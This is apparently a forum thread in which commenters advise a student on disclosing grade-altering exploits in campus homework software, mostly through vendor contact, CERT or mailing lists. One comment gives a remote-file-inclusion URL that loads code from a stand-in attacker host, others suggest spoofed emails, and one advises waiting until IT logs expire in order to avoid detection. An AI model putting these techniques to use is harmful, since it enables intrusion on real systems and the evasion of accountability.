Disclosure of Major Software Exploits by Students?

school-hacker asks: "I am a U.S. university student who has recently come across 2 remote exploits for a homework program used by colleges nationwide. Both vulnerabilities allow students to give themselves arbitrary scores, and possibly execute arbitrary code. To further emphasize the scope of this vulnerability, I have written and -selftested proof-of-concept exploit code. Naturally, I want to share this information with their software engineers, and would even be nice enough and suggest a means to fixing it. However, with the state of current intellectual property and reverse-engineering laws, I hesitate to do so out of fear of litigation or academic disciplinary action. As an ethical geek, what do -you- do?" While the responses from an earlier story might prove useful, here, there is always the possibility of the university making things harder for the person reporting the problem. How can students avoid both legal and academic trouble, when trying to notify their university of security problems?

Blackboard

[zerocool^]

This is probably having to do with "blackboard" software, i.e. learn.vt.edu.

This software tries to be everything to everyone, and all most teachers use it for is posting grades.

It doesn't surprise me that there are bugs in it, though. There have been several show up on astalavista.box.sk, and those were fixed, but the design of the program doesn't strike me as being particularlly sound.

~Will

The standard way.

[Popsikle]

Being a member of the secuirty scene (not a very skilled memeber but im tryin! ;) ) The standard way would be to email the vendor. If you want to do it anonomously pm me and I can set you up a POP3 account ;) Briefly state the issues, and the holes, how the exploit works, and inform them that if no repsonse is made you will foward the exploit and the security brief to the proper mailling lists. It is law in California now that any security breach must be made public so just remind them of that. Normally they will repsond asking for futher details, foward them your proof-of-concept and again warn them if corrective measures are not made you will announce it publicly. It should result in a patch, in which case make your findings public with information on how to patch or where to obtain the patch for the software. If all communications fails there is the [FULL-DISCLOSER] and the [INCIDENTS] mailing lists. Again if you are worried about your school and/or IP laws the best thing would be to spoof an email to the lists (if it comes down to that) or use a Email account that your name IS NOT attached to. Most companies will thank you for informing them before going public, and It is the right thing to do =) Also try digging thru your AUP and TOS for the network at school, in there it may state some legalities about breaking into to systems, hacking, sniffing, ect. If all else fails, forward your finding to a trusted source, and have them take the actions required. Remember you are not required by any law to make your findings public, so if you really feel uneasy just forget about the whole thing.

Re:the Slashdot way

[The+Old+Burke]

Or use husmail.com
Send the mail with exploit to abuse/contact/CEO@companywithexploit.com
Tell them that you will release the exploit within 30/60/90 days on Bugtraq, Freenet and Slashdot unless they fix it.

Make sure you also send the mail to:
-Local/regional newspapers.
-The school/school council/principal/teachers/newspaper.
-Local government official(s).

If they don't fix the shit after this, release the exploit *anonymously*.

Re:Had this problem with SUN

They were running a comment system that did server side includes. The URL pattern was

http://java.sun.com/foo.jsp?url=relative/path.inc

I'm not sure if this was the case here, but this can be far more dangerous in some cases, since you can do off-server includes (in PHP at least).

This means you couuld do something like:

http://java.sun.com/foo.jsp?url=http://www.hax0r-s ite.com/mycode.inc

And it would execute "mycode.inc" on their server, meaning you could run *arbitrary* code on their server. That's a big hole a lot of web developers don't catch.

That's how Stefan Puffer got indicted

[rfmobile]

That's exactly how Stefan Puffer got indicted in Houston Texas last year. He provided a demonstration of an insecure county wireless system in front of a newpaper reporter and a county IT employee. He was later no-billed by the county but I'm sure his attorney's bill was a few $$$. -rick

blackboard? not necessarily..

[Mobster75]

Sure, it's probably Blackboard which most colleges use, but if it's not Bb, it could also be Banner by SCT which plenty of schools also use.

Compromising Banner is far more dangerous than Blackboard (Bb).... Most schools that use Banner use it as their student management system, which records official transcript, program requirements met, class registration, etc. etc.

In my last undergrad semester, my team developed a website that interfaced directly w/ the Banner system and even found some loopholes in it which we exploited to allow our website to do a better job at calculating program requirements met and suggested offerings to complete it. (This was for an Advanced Software Project Mgmt class)

Needless to say, the Registrars office people were very intrigued by our exploration into the limits of the current system. I imagine a less cooperative school administration would be more punitive.. (But I went to a business school, so they know we just get motivated by $$ ;) )

Re:blackboard? not necessarily..

[calethix]

I've found what I would consider security issues in Banner's web products before. Stuff that if you pass the correct variables to it, will display information from the database without doing any kind of user validation.
To understand the issue, you have to know that it uses Oracle Application Server which basically lets you execute packages in the database. All of the main web packages do user validation but some of them call other packages to display the content of the page (which don't always do validation).
So, if you know what variables to pass to said packages, you can bypass their security. SCT told me that since those were only supporting packages, they were functioning properly and they wouldn't do anything to change them.
Granted, you have to have a pretty in depth knowledge of how their web products work but that's a good number of employees at any school using Banner. We have access to all of the package/program source so we can customize it for our university's needs.
Oh well, I've ranted about SCT enough. :)
What was funnier though was when I discovered that our database had execute any procedure granted to public, i.e. the web user. That essentialy opened up any database procedure to be executed by an anonymous user via the web. I think that one was our fault instead of SCT's and it was fourtunately taken care of fairly quickly.

Post the info anonymously on Freenet

[Tracy+Reed]

Freenet Project

And then give yourself an A. :)

Re:if blackboard

[zerocool^]

Or cross-site scripting vulnerabilities. I think it uses php, also, mabey. Not sure.

I am sure that it uses POST instead of PUT.

~Will

Re:Give Yourself an A

[nametaken]

As far as legal counsel goes, I think it would be both cheap (and kinda funny) if you use the free legal advice offered by the campuses themselves to determine a course of action.

Nearly ever campus has free legal advice for students consultation.

You are already in serious trouble.

[The+Revolutionary]

If you have done what I think you have, then you are quite probably screwed no matter what course of action you choose.

If you do report the problem, the IT administrators will be obliged to perform a damage assessment. They will scan their logs for behavior possibly taking advantage of this exploit. That you say you have proof of concept code, and presumably have tested it, if IT discovers that you have so much as tried to take advantage of this or a related exploit, it will almost certainly result in your dismissal for that Semester, criminal charges, and possibly the end of your academic career.

It won't help to go through a professor. If IT comes back and says that they have evidence that you tried to take advantage of the exploit (by 'testing'), you will not be spared, and the professor will either be unwilling or unable to protect you.

If you do not report the problem, you risk IT discovering the exploit on their own or through a security update from the vendor, and similarly performing damage assessment to discover whether or not their systems or data have been compromised, or attempted to have been compromised.

Don't scoff at this. If it is a significant exploit, and given that there is now a story on Slashdot about it, there is a significant possibility that IT will perform a damage assessment.

Further, depending upon how you found or 'tested' this exploit, IT may find you out whether or not they realize or are alerted to the nature of the exploit.

It is really up to you. Only you know the nature of your investigative activities and testing. If discovering these exploits required behavior which went beyond the normal use of the system, then you have a very serious problem.

How do you explain why you were doing this in the first place? You can't, and quite honestly, there is almost certainly no excuse for it. If you were concerned about the security of the system, you should have gone through official channels to get clearance to look for vulnerabilities, and report the sort of investigative techniques you would be using, and do only this.

If you have not done this, then you have one course of action:
- Find out how long of a period IT keeps logs for. If you are a technically inclined, student, then surely you have aquaintences -- students -- who work in IT.
- If the logs of your activity are gone, then you are in the clear. Report the vulnerability anonymously the next time you are off campus. Unfortunately, from the few academic IT departments I am familiar with, they keeps logs for a very long time, because of issues just like these.
- If, on the other hand, the logs of your activity are not gone, then weigh the possibility of your activity being found out before the logs will be cycled or destroyed.

If the logs will be around for months still, then you are quite possibly in serious trouble. If the logs will be around for a year or more, then you are almost certainly in very serious trouble.

If you report your activities, then you are are almmost certainly in very serious trouble.

Personally, I would go with the first option, and hope that your IT department will not perform damage assessment, or that they will not find out above the exploit until next semester, and will not be interested in logs from the previous semester, or perhaps from the previous academic year.

Re:the Slashdot way

[syukton]

hushmail.com you mean?

Contact Me

[jsnider]

I'm making the assumption that the software you found a problem in is Blackboard. I apologize if that is not the
case, however, I would still be happy to take your discovery to the vendors of whatever software it is on your
behalf.

I work for a major university as the Blackboard programmer/administrator. I've been working on the
Blackboard code for years, making substantial modifications to the Bb system to suit our university. I've found
my share of bugs, problems, and more than one gaping hole. Blackboard is riddled with XSS, input validation, SQL
insertion, replay, predictable sequences, and I'm sure countless other vulnerabilities. Quite frankly I'm amazed
at how few breaches I hear about.

I think you're right to be careful, but try to not get carried away. At least in our department, we're eager to
hear about problems and fix them. We're not interested in ruining someone's college education. However, you
should be careful about who you contact. At our university, the usual IT people are paranoid. You need to
get as close to the people who deal with Bb as you possibly can. Contacting a suit in upper IT would likely get
you the slapdown. Start lower. You're looking for the geeky programmer who deals with Bb all day long and would
drop everything they are doing to fix a hole in their system.

If you are not comfortable contacting representatives at your university, feel free to contact me about your
discovery. This sort of stuff is what I do, and besides, I'm already on Blackboard's shit list. I have another
issue to report to Bb, (the afore mentioned gaping hole) and I'd be happy to send your information along with it,
with or without your name. jeff (somewhere near) jsnider.net

Re:if blackboard

[glob]

i've installed blackboard more than once.

it's mainly perl (on apache with mysql).

one component (tutornet) is java.

Tell CERT about it

Simple, submit the info of the exploit and fix to CERT and they will take care of the rest.